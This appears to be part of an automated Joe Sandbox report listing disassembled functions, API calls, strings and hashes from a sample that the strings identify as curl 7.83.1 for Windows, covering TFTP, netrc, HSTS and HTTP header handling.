                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: fwrite$fflush$fputcfree
                                    • String ID: %.*s:$Content-disposition:$etag:$filename=
                                    • API String ID: 697768202-2097661518
                                    • Opcode ID: 524a0b53e74dcf8c095d01d718f7640843cd95dd9fc4210ebe007878a49280ef
                                    • Instruction ID: fed137bbe8e0eb49a6810bb7a4fa2a7e283c0b255cd71254e0485d172f7755ef
                                    • Opcode Fuzzy Hash: 524a0b53e74dcf8c095d01d718f7640843cd95dd9fc4210ebe007878a49280ef
                                    • Instruction Fuzzy Hash: 20A1D431A00745AFDB25CF64C880BAABBF1AF41348F1895ADE8567F291D771AEC0CB50
                                    Function 00E37FE8 Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 239networkCOMMON
                                    Download Yara Rule
                                    APIs
                                    • sendto.WS2_32(?,?,00000004,00000000,?,?), ref: 00E380F9
                                    • sendto.WS2_32(?,?,?,00000000,?,?), ref: 00E38193
                                    • WSAGetLastError.WS2_32(?,?,00000004,?,00000000), ref: 00E381A2
                                    • _time64.API-MS-WIN-CRT-TIME-L1-1-0(?,00000004,?,00000000), ref: 00E381D1
                                    Strings
                                    • tftp_tx: giving up waiting for block %d ack, xrefs: 00E3816A
                                    • ;y, xrefs: 00E38336
                                    • Received ACK for block %d, expecting %d, xrefs: 00E38149
                                    • Timeout waiting for block %d ACK. Retries = %d, xrefs: 00E3804D
                                    • tftp_tx: internal error, event: %i, xrefs: 00E38028
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: sendto$ErrorLast_time64
                                    • String ID: ;y$Received ACK for block %d, expecting %d$Timeout waiting for block %d ACK. Retries = %d$tftp_tx: giving up waiting for block %d ack$tftp_tx: internal error, event: %i
                                    • API String ID: 3931062552-1033658319
                                    • Opcode ID: 524b3708bc05d34a19173ccf32d04971e0806f56954310d88342c2eea87e4760
                                    • Instruction ID: e489a283b1d492197f679e71bd5ac26bf548a5bb77930cee300c17d9f6fa5bad
                                    • Opcode Fuzzy Hash: 524b3708bc05d34a19173ccf32d04971e0806f56954310d88342c2eea87e4760
                                    • Instruction Fuzzy Hash: FC919971204B019FD7658F38C999BF6BBE5EB29704F04492DF89EA3261DB70B948CB50
                                    Function 00E09DC4 Relevance: 21.2, APIs: 10, Strings: 2, Instructions: 208COMMON
                                    Download Yara Rule
                                    APIs
                                    • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00E09DCF
                                    • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00E09E7A
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00E09F01
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00E09F0F
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00E09F5B
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E09F70
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00E09F9B
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00E09FAA
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00E09FC5
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00E09FD9
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: free$_strdup
                                    • String ID: out of memory$k%
                                    • API String ID: 2653869212-351869995
                                    • Opcode ID: e7430ae2b5ea87c401da8e5f745288e407dd28c362d2821c61c7b6d2a404572f
                                    • Instruction ID: 63ace29573dd8c2dac9ea35a0dd83224418f7ea3dfaebe38bedebb658d3f8f38
                                    • Opcode Fuzzy Hash: e7430ae2b5ea87c401da8e5f745288e407dd28c362d2821c61c7b6d2a404572f
                                    • Instruction Fuzzy Hash: 32814B35A013068FDB14CFA5D898BADB7B1FF44315F28517AE809AF297DB70A885CB50
                                    Function 00E14F35 Relevance: 21.2, APIs: 10, Strings: 2, Instructions: 178stringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • ___from_strstr_to_strchr.LIBCMT ref: 00E14F5C
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E14FD2
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E14FE4
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E14FF6
                                    • strcspn.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00E62984,00000000,00000000,?), ref: 00E15039
                                    • ___from_strstr_to_strchr.LIBCMT ref: 00E15055
                                    • strcspn.API-MS-WIN-CRT-STRING-L1-1-0(?,00E62984,00000000,00000000,?), ref: 00E15082
                                    • ___from_strstr_to_strchr.LIBCMT ref: 00E1509A
                                    • strcspn.API-MS-WIN-CRT-STRING-L1-1-0(E[,00E62984,00000000,00000000,?), ref: 00E150C3
                                    • ___from_strstr_to_strchr.LIBCMT ref: 00E150DB
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: ___from_strstr_to_strchr$freestrcspn
                                    • String ID: $E[
                                    • API String ID: 2030676775-918557827
                                    • Opcode ID: 0a6a74b2a13fa9be2cf33d8eb3ab780fc5080ad9854f2fe676b0ce7468d1a542
                                    • Instruction ID: 346c2ae43ca84cfbf237932b473bf82c61c9b57fb8071aa7ac9a812503bedb6c
                                    • Opcode Fuzzy Hash: 0a6a74b2a13fa9be2cf33d8eb3ab780fc5080ad9854f2fe676b0ce7468d1a542
                                    • Instruction Fuzzy Hash: CA51E472904705DFDB248F94E8847EEBBF4EF48364F20A45EE806B3281DB759D858B90
                                    Function 00E02AA8 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 137stringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • _strdup.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00E02AC3
                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00E02ADE
                                    • strtok.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00E57348), ref: 00E02AFC
                                    • strtok.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00E57348), ref: 00E02B19
                                    • _mkdir.API-MS-WIN-CRT-FILESYSTEM-L1-1-0(00000000), ref: 00E02B9F
                                    • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00E02BAA
                                    • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00E02BB5
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 00E02BD0
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00E02BDB
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: _errnofreestrtok$_mkdir_strdupmalloc
                                    • String ID: %s%s$0kv@qv@/lv
                                    • API String ID: 2356461126-1252674071
                                    • Opcode ID: 6e0272c88547b3d9cca8426d2944417c3b98a0ff139b4051fe8333bb7c7f96dc
                                    • Instruction ID: 45a0fb39cbcee0d9651fd615063dc528d8255cf8f2a0a001332bc160426e330d
                                    • Opcode Fuzzy Hash: 6e0272c88547b3d9cca8426d2944417c3b98a0ff139b4051fe8333bb7c7f96dc
                                    • Instruction Fuzzy Hash: 5441AD36608301AFDF295F786C5C9BE37F4DB06765B20159EEE41B72C1DB608C898AB0
                                    Function 00E08A54 Relevance: 21.1, APIs: 3, Strings: 9, Instructions: 98COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00E120F5: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000001,?,?,?,00E08A7A,curl 7.83.1 (Windows) %s,00000000), ref: 00E12101
                                    • puts.API-MS-WIN-CRT-STDIO-L1-1-0(00E574AB), ref: 00E08AC7
                                    • qsort.API-MS-WIN-CRT-UTILITY-L1-1-0(?,00000000,00000004,Function_00008A20), ref: 00E08B1A
                                    • puts.API-MS-WIN-CRT-STDIO-L1-1-0(00E574AB), ref: 00E08B43
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: puts$__acrt_iob_funcqsort
                                    • String ID: %s$%s $2022-05-13$7.83.1$Features:$Protocols: $Release-Date: %s$WARNING: curl and libcurl versions do not match. Functionality may be affected.$curl 7.83.1 (Windows) %s
                                    • API String ID: 619265888-3826092985
                                    • Opcode ID: 620147e8e3b266ff76e701ef3a70e123db44ab335a98ebd3b23d44cc5128bb60
                                    • Instruction ID: b3ff9fbe376e89d2e8c2c7ba1955cdfe063768838144341baaae783f1ee964d5
                                    • Opcode Fuzzy Hash: 620147e8e3b266ff76e701ef3a70e123db44ab335a98ebd3b23d44cc5128bb60
                                    • Instruction Fuzzy Hash: 7A313B793403009FC704AF58FC42CAA37A5FB4C705B14263AF895B7291DFA29C89C655
                                    Function 00E035D3 Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 89filetimeCOMMON
                                    Download Yara Rule
                                    APIs
                                    • _strdup.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00E035E5
                                    • CreateFileA.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00000080,00000007,00000000,00000003,00000000,00000000), ref: 00E035FD
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00E0360D
                                    • GetFileTime.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00000000,00000000,?), ref: 00E03621
                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00E03666
                                    • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(00000000), ref: 00E03688
                                    • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00E03690
                                    • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00E0369B
                                    Strings
                                    • Failed to get filetime: underflow, xrefs: 00E03646
                                    • Failed to get filetime: GetFileTime failed: GetLastError %u, xrefs: 00E03679
                                    • Failed to get filetime: CreateFile failed: GetLastError %u, xrefs: 00E036A2
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: ErrorFileLast$CloseCreateHandleTimeUnothrow_t@std@@@__ehfuncinfo$??2@_strdupfree
                                    • String ID: Failed to get filetime: CreateFile failed: GetLastError %u$Failed to get filetime: GetFileTime failed: GetLastError %u$Failed to get filetime: underflow
                                    • API String ID: 862977939-2112902429
                                    • Opcode ID: 7709c642762d25d0e9ccd7c501e178871624ae1036af126645b316590682bee7
                                    • Instruction ID: 4c2af7300118b82bc6a5ebf610bf8b97ffd37ee9ccad2d948d64c3cabf68b686
                                    • Opcode Fuzzy Hash: 7709c642762d25d0e9ccd7c501e178871624ae1036af126645b316590682bee7
                                    • Instruction Fuzzy Hash: 0E210A72605B007FD7089BB4AC4AF7F7BACEB41702F145529F902F62C1EA719E444624
                                    Function 00E246F5 Relevance: 19.8, APIs: 9, Strings: 4, Instructions: 272COMMON
                                    Download Yara Rule
                                    APIs
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E2473C
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E24755
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E24772
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E2479C
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E24874
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E248C3
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E248D7
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E248F3
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E2495C
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: free
                                    • String ID: %s%s.netrc$%s%s_netrc$Couldn't find host %s in the %s file; using defaults$HOME
                                    • API String ID: 1294909896-3314400472
                                    • Opcode ID: cf279ba9a608e6b0d6b2301638b4d36e79323fda1888e1ad3347052056411d18
                                    • Instruction ID: c001ec21d300395cdc3d9894ecdbb92980fff9639d17bbf950947c309521cba1
                                    • Opcode Fuzzy Hash: cf279ba9a608e6b0d6b2301638b4d36e79323fda1888e1ad3347052056411d18
                                    • Instruction Fuzzy Hash: F2A19175A0462AEFCB189B65FC416AEB7F4FF48351F109066E805B32A0EB746D44CF90
                                    Function 00E233BC Relevance: 19.7, APIs: 6, Strings: 5, Instructions: 418stringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E2346D
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E234FF
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E235A5
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E235E8
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E23637
                                    • strtoul.API-MS-WIN-CRT-CONVERT-L1-1-0(?,00000000,0000000A), ref: 00E2381E
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: free$strtoul
                                    • String ID: %s://%s$Switched from HTTP to HTTPS due to HSTS => %s$file$http$https
                                    • API String ID: 961130014-588811053
                                    • Opcode ID: 0cd22249176ca0b25ba118a8f4b28ac445b86f82d62db6e43ceb62e8454d5a45
                                    • Instruction ID: 64ded2ec6bf4e111e42ec7df42888430ab6254592574a47d64d8a76c076a38b1
                                    • Opcode Fuzzy Hash: 0cd22249176ca0b25ba118a8f4b28ac445b86f82d62db6e43ceb62e8454d5a45
                                    • Instruction Fuzzy Hash: 2CE10571704616AFEB1CDB34EC51BEAB7E5AF44314F14912AE819B72C1DF78AE448B80
                                    Function 00E3F120 Relevance: 19.5, APIs: 4, Strings: 7, Instructions: 236networkCOMMON
                                    Download Yara Rule
                                    APIs
                                    • send.WS2_32(?,?,00000006,00000000), ref: 00E3F340
                                    • WSAGetLastError.WS2_32 ref: 00E3F34A
                                    • send.WS2_32(?,?,?,00000000), ref: 00E3F3E5
                                    • WSAGetLastError.WS2_32 ref: 00E3F3EF
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: ErrorLastsend
                                    • String ID: %127[^,]%1[,]%127s$%c%c$%c%c%c%c$%c%c%c%c%s%c%c$%c%s$%c%s%c%s$Sending data failed (%d)
                                    • API String ID: 1802528911-3533120981
                                    • Opcode ID: 81e9a4e21efb7286f9b8126625b36a90b96433b4c5b6f8b49918d0e8f8e5aee8
                                    • Instruction ID: 999ea9a7c7ce4f08c52b6d418a6d99c49557f9c0492d9b62c24afbdec007348d
                                    • Opcode Fuzzy Hash: 81e9a4e21efb7286f9b8126625b36a90b96433b4c5b6f8b49918d0e8f8e5aee8
                                    • Instruction Fuzzy Hash: 8C81C471A44219AFEB20DB24DC55FEB7BACAB44704F0441F5F549FB283DA71AA84CB60
                                    Function 00E3187B Relevance: 19.5, APIs: 3, Strings: 8, Instructions: 225COMMON
                                    Download Yara Rule
                                    APIs
                                    • ___from_strstr_to_strchr.LIBCMT ref: 00E31902
                                    • ___from_strstr_to_strchr.LIBCMT ref: 00E31913
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00000000,?,?,?,?,?,?,?,00E2A14F,?), ref: 00E31AC8
                                      • Part of subcall function 00E1D126: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E1D13A
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: ___from_strstr_to_strchrfree
                                    • String ID: %s$Authorization:$Connection:$Content-Length:$Content-Type:$Cookie:$Host:$Transfer-Encoding:
                                    • API String ID: 653773606-2985882615
                                    • Opcode ID: 6bd58bfbf59d8e94a34cd1c830bf845527deb354a352969c8a931ff980e195d8
                                    • Instruction ID: b73efcccf5e538115656993f82f51dc99526f4f575841654b610189574b8f707
                                    • Opcode Fuzzy Hash: 6bd58bfbf59d8e94a34cd1c830bf845527deb354a352969c8a931ff980e195d8
                                    • Instruction Fuzzy Hash: 42711330F043069BDF28CF6498987ADBFE2AF84358F2460AED955BB281DB709D41C790
                                    Function 00E02DFA Relevance: 19.5, APIs: 4, Strings: 7, Instructions: 224stringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000002,00000001,00000000,00000000), ref: 00E02E50
                                    • strncpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00000000,00000002), ref: 00E02E67
                                    • strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,00000103,00000001,00000000,00000000), ref: 00E02EB2
                                    • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00E02FA9
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: strncpy$_strdupmalloc
                                    • String ID: AUX$CLOCK$$COM$CON$LPT$NUL$PRN
                                    • API String ID: 3833483438-925842913
                                    • Opcode ID: 66731a4d9c24d0b69d6d1b40accbc8570879ccb21e822c3c5a46fdaadd2ed5ba
                                    • Instruction ID: 1ef631b4e81932da84dffdd29fb11cb4e879169983a83681ee0a9677cd6e4f52
                                    • Opcode Fuzzy Hash: 66731a4d9c24d0b69d6d1b40accbc8570879ccb21e822c3c5a46fdaadd2ed5ba
                                    • Instruction Fuzzy Hash: 38615C3170420357DF254A348C68BFA77EA9B96798F14606DDE81BB2C1DB348FC68750
                                    Function 00E37D59 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 187networkCOMMON
                                    Download Yara Rule
                                    APIs
                                    • sendto.WS2_32(?,?,00000004,00000000,?,?), ref: 00E37E69
                                    • sendto.WS2_32(?,?,00000004,00000000,?,?), ref: 00E37ECD
                                    • sendto.WS2_32(?,?,00000004,00000000,?,?), ref: 00E37F6D
                                    • WSAGetLastError.WS2_32(?,?,00000000), ref: 00E37F78
                                    • _time64.API-MS-WIN-CRT-TIME-L1-1-0(?,?,00000000), ref: 00E37FBE
                                    Strings
                                    • uy, xrefs: 00E37FD9
                                    • Received unexpected DATA packet block %d, expecting block %d, xrefs: 00E37FC9
                                    • Timeout waiting for block %d ACK. Retries = %d, xrefs: 00E37DC3
                                    • tftp_rx: internal error, xrefs: 00E37D97
                                    • Received last DATA packet block %d again., xrefs: 00E37F0D
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: sendto$ErrorLast_time64
                                    • String ID: Received last DATA packet block %d again.$Received unexpected DATA packet block %d, expecting block %d$Timeout waiting for block %d ACK. Retries = %d$tftp_rx: internal error$uy
                                    • API String ID: 3931062552-606568267
                                    • Opcode ID: 42f2dfd9a3c8b625cc322cdaea0d63eb2555b2ce951a3219e575e4082335ce35
                                    • Instruction ID: b5314766e7b19d3d5ddf3d0c33275e89b45c175fbfdcadacce6050efe3e486d4
                                    • Opcode Fuzzy Hash: 42f2dfd9a3c8b625cc322cdaea0d63eb2555b2ce951a3219e575e4082335ce35
                                    • Instruction Fuzzy Hash: FC71ACB1208B40AFD3318F24CC99BF7BBE5FB15704F04485DE9DEA62A1D670A908DB61
                                    Function 00E10B38 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 111libraryloaderCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetModuleHandleA.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(ntdll,RtlVerifyVersionInfo), ref: 00E10B6D
                                    • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000000), ref: 00E10B74
                                    • VerSetConditionMask.API-MS-WIN-CORE-SYSINFO-L1-2-0(00000000,00000000,00000002,?), ref: 00E10C07
                                    • VerSetConditionMask.API-MS-WIN-CORE-SYSINFO-L1-2-0(00000000,?,00000001,?), ref: 00E10C15
                                    • VerSetConditionMask.API-MS-WIN-CORE-SYSINFO-L1-2-0(00000000,?,00000020,?,?,00000001,?), ref: 00E10C23
                                    • VerSetConditionMask.API-MS-WIN-CORE-SYSINFO-L1-2-0(00000000,?,00000010,?,?,00000020,?,?,00000001,?), ref: 00E10C31
                                    • VerSetConditionMask.API-MS-WIN-CORE-SYSINFO-L1-2-0(00000000,?,00000008,00000001,?,00000010,?,?,00000020,?,?,00000001,?), ref: 00E10C3D
                                    • RtlVerifyVersionInfo.NTDLL(?,?,00000008,00000001), ref: 00E10C5E
                                    • VerifyVersionInfoW.API-MS-WIN-CORE-KERNEL32-LEGACY-L1-1-1(?,0000003B,00000000,?,?,00000008,00000001,?,00000010,?,?,00000020,?,?,00000001,?), ref: 00E10C68
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
